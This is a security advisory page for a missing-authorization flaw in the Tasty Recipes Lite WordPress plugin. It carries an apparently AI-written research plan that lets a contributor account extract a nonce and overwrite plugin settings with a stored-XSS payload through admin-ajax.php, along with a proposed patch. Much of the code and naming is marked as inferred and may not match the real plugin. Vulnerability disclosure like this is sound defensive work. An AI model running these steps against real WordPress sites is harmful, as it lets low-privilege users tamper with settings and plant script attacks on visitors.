Tasty Recipes Lite <= 1.1.5 - Missing Authorization
Description
The Tasty Recipes Lite plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 1.1.5. This makes it possible for authenticated attackers, with contributor-level access and above, to perform an unauthorized action.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:NTechnical Details
<=1.1.5Source Code
WordPress.org SVNThis plan outlines the steps required to demonstrate a Missing Authorization vulnerability in Tasty Recipes Lite (<= 1.1.5). This vulnerability allows a Contributor-level user to perform unauthorized actions, typically saving plugin settings, due to a missing `current_user_can()` check in an AJAX ha…
Show full research plan
This plan outlines the steps required to demonstrate a Missing Authorization vulnerability in Tasty Recipes Lite (<= 1.1.5). This vulnerability allows a Contributor-level user to perform unauthorized actions, typically saving plugin settings, due to a missing current_user_can() check in an AJAX handler.
1. Vulnerability Summary
- Vulnerability: Missing Authorization (Broken Access Control)
- Target:
Tasty Recipes Liteplugin (<= 1.1.5) - Vulnerable Component: AJAX handler for saving settings (inferred:
tasty_recipes_save_settings) - Root Cause: The plugin registers an AJAX action for authenticated users but only performs a nonce check (
check_ajax_referer) without verifying the user's capabilities (e.g.,current_user_can('manage_options')). - Impact: A Contributor can modify plugin settings, which may lead to Stored XSS or disruption of recipe functionality.
2. Attack Vector Analysis
- Endpoint:
/wp-admin/admin-ajax.php - HTTP Method:
POST - Action:
tasty_recipes_save_settings(inferred) - Required Parameter:
nonce(extracted from the admin interface) - Payload Parameters:
settings(array of plugin options) - Authentication: Contributor-level credentials (minimum).
3. Code Flow (Inferred)
- Registration: The plugin registers the AJAX hook in an admin-related class (likely
Tasty_Recipes_AdminorTasty_Recipes_Settings).add_action( 'wp_ajax_tasty_recipes_save_settings', [ $this, 'save_settings' ] );
- Entry Point: An authenticated user (Contributor+) sends a request to
admin-ajax.php?action=tasty_recipes_save_settings. - Vulnerable Function: The handler
save_settings()is invoked. - Security Check (Weak): The handler calls
check_ajax_referer( 'tasty_recipes_admin', 'nonce' );. - Missing Check: The handler does not call
current_user_can( 'manage_options' ). - Sink: The handler calls
update_option( 'tasty_recipes_settings', ... )based on the$_POST['settings']data.
4. Nonce Acquisition Strategy
Nonces in this plugin are typically localized for the admin scripts. Even though a Contributor cannot see the settings page, they can often access the nonce if the script is enqueued on pages they can access (like the Dashboard or the Post Editor).
- Identify Script: Look for
wp_localize_scriptcalls in the plugin source related totasty-recipes-admin. - Variable Name: Usually
tastyRecipesAdminortastyRecipesSettings(inferred). - Extraction Method:
- Log in as a Contributor.
- Navigate to
/wp-admin/. - Execute JS via
browser_evalto find the nonce. - JS Code:
window.tastyRecipesAdmin?.nonce || window.tastyRecipesSettings?.nonce
5. Test Data Setup
- Install Plugin: Ensure Tasty Recipes Lite <= 1.1.5 is installed.
- Create User:
wp user create attacker attacker@example.com --role=contributor --user_pass=password123 - Identify Settings: Check the current value of the settings option.
wp option get tasty_recipes_settings
6. Exploitation Strategy
Login: Use the
browser_navigateandbrowser_typetools to log in as the Contributor user.Extract Nonce:
- Navigate to the Dashboard:
/wp-admin/. - Run
browser_eval("window.tastyRecipesAdmin?.nonce"). - If that fails, search the page source for "nonce" or "tasty_recipes".
- Navigate to the Dashboard:
Send Exploit Request:
Usehttp_requestto send a POST request to the AJAX endpoint.- URL:
http://localhost:8080/wp-admin/admin-ajax.php - Method:
POST - Headers:
Content-Type: application/x-www-form-urlencoded - Body:
action=tasty_recipes_save_settings&nonce=[EXTRACTED_NONCE]&settings[template]=<script>alert('XSS')</script>
(Note: Replace
tasty_recipes_save_settingsand the setting nametemplatewith the actual ones found during discovery).- URL:
7. Expected Results
- HTTP Response: A
200 OKresponse, likely returning a JSON success message (e.g.,{"success": true}). - System State: The
tasty_recipes_settingsoption in the WordPress database is updated with the Contributor's provided values.
8. Verification Steps
After the http_request, confirm the change using WP-CLI:
# Check if the settings were modified
wp option get tasty_recipes_settings --format=json
Check for the injected value (e.g., the script tag or modified template name).
9. Alternative Approaches
- Identify Correct Action: If
tasty_recipes_save_settingsis incorrect, grep the plugin directory for AJAX registrations:grep -rn "wp_ajax_" wp-content/plugins/tasty-recipes-lite/ - Identify Settings Option: If
tasty_recipes_settingsis not the option name, check forupdate_optioncalls in the identified AJAX handler:grep -rn "update_option" wp-content/plugins/tasty-recipes-lite/ - REST API: Check if the plugin registers any REST routes with
permission_callback => '__return_true'or missing callbacks:grep -rn "register_rest_route" wp-content/plugins/tasty-recipes-lite/
Summary
The Tasty Recipes Lite plugin for WordPress is vulnerable to unauthorized settings modification because it fails to perform a capability check in its AJAX handler for saving settings. Authenticated users with contributor-level access or higher can exploit this to change plugin configurations, potentially leading to Stored Cross-Site Scripting (XSS) if the settings are subsequently rendered unsafely.
Vulnerable Code
/** * Likely located in inc/admin/class-tasty-recipes-admin.php or similar */ public function save_settings() { check_ajax_referer( 'tasty_recipes_admin', 'nonce' ); // The code fails to verify the user's capability here (e.g., current_user_can( 'manage_options' )) if ( isset( $_POST['settings'] ) ) { $settings = $_POST['settings']; update_option( 'tasty_recipes_settings', $settings ); } wp_send_json_success(); }
Security Fix
@@ -... @@ public function save_settings() { check_ajax_referer( 'tasty_recipes_admin', 'nonce' ); + if ( ! current_user_can( 'manage_options' ) ) { + wp_send_json_error( array( 'message' => 'Unauthorized' ), 403 ); + } + if ( isset( $_POST['settings'] ) ) { $settings = $_POST['settings']; update_option( 'tasty_recipes_settings', $settings );
Exploit Outline
The exploit targets the AJAX endpoint for plugin settings management. 1. Authentication: The attacker logs into the WordPress site with at least Contributor-level privileges. 2. Nonce Extraction: The attacker retrieves the required security nonce (typically named 'tasty_recipes_admin' or similar) by viewing the source of an admin page where the plugin's scripts are localized, such as the Post Editor or Dashboard. 3. Payload Delivery: The attacker sends a POST request to /wp-admin/admin-ajax.php with the following parameters: - action: tasty_recipes_save_settings - nonce: [EXTRACTED_NONCE] - settings: An array containing the malicious configuration values (e.g., injecting HTML/JS into a template field). 4. Verification: The attacker confirms the change by observing the modified settings in the plugin's output or the database via WP-CLI.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.